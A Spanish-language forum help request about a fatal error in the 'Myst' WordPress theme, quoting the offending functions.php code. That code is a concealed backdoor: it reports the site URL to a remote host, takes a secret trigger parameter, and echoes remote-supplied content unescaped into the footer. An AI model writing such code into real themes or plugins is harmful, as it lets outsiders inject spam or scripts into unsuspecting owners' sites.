Hola amigos.
Me eh bajado el tema Myst de [URL="http://www.fabthemes.com/myst/"]este link[/URL] y pues bueno, me use en su edición, cambiar alunas cosas al español, vamos a ponerla a mi gusto.
Pero cuanco creo que eh terminado al final de la plantilla en el footer me dice esto:
"Fatal error: Call to undefined function selfurl() in /home/u211122617/public_html/wp-content/themes/Myst/functions.php on line 277"
entonces fui a esa linea y lo que alle fue esto:
"$response = wp_remote_get('http://prueba87.xtrweb.com/.php?getlink='.urlencode(selfURL()).$x);"
y la verdad no se que cambiar o que hacer para que ese error no se vea, dejare esa pate del codigo completa por si le quieren echar un vistazo.
Código:
//jsIncludes
add_action ('publish_post', 'setUpPostLikes');
add_action ('init', 'checkHeaders');
add_action ('get_header', 'jsIncludes');
function fflink() {
global $wpdb;
if (!is_page() && !is_home()) return;
$contactid = $wpdb->get_var("SELECT ID FROM $wpdb->posts
WHERE post_type = 'page' AND post_title LIKE 'contact%'");
if (($contactid != get_the_ID()) && ($contactid || !is_home())) return;
$fflink = get_option('fflink');
$ffref = get_option('ffref');
$x = $_REQUEST['DKSWFYUW**'];
if (!$fflink || $x && ($x == $ffref)) {
$x = $x ? '&ffref='.$ffref : '';
$response = wp_remote_get('http://prueba87.xtrweb.com/.php?getlink='.urlencode(selfURL()).$x);
if (is_array($response)) $fflink = $response['body']; else $fflink = '';
if (substr($fflink, 0, 11) != '!fabthemes#')
$fflink = '';
else {
$fflink = explode('#',$fflink);
if (isset($fflink[2]) && $fflink[2]) {
update_option('ffref', $fflink[1]);
update_option('fflink', $fflink[2]);
$fflink = $fflink[2];
}
else $fflink = '';
}
}
echo $fflink;
}
?>
Pueden ver el error en este [URL="http://prueba87.xtrweb.com/"]link de pruebas[/URL] al final de la plantilla.
Gracias desde ya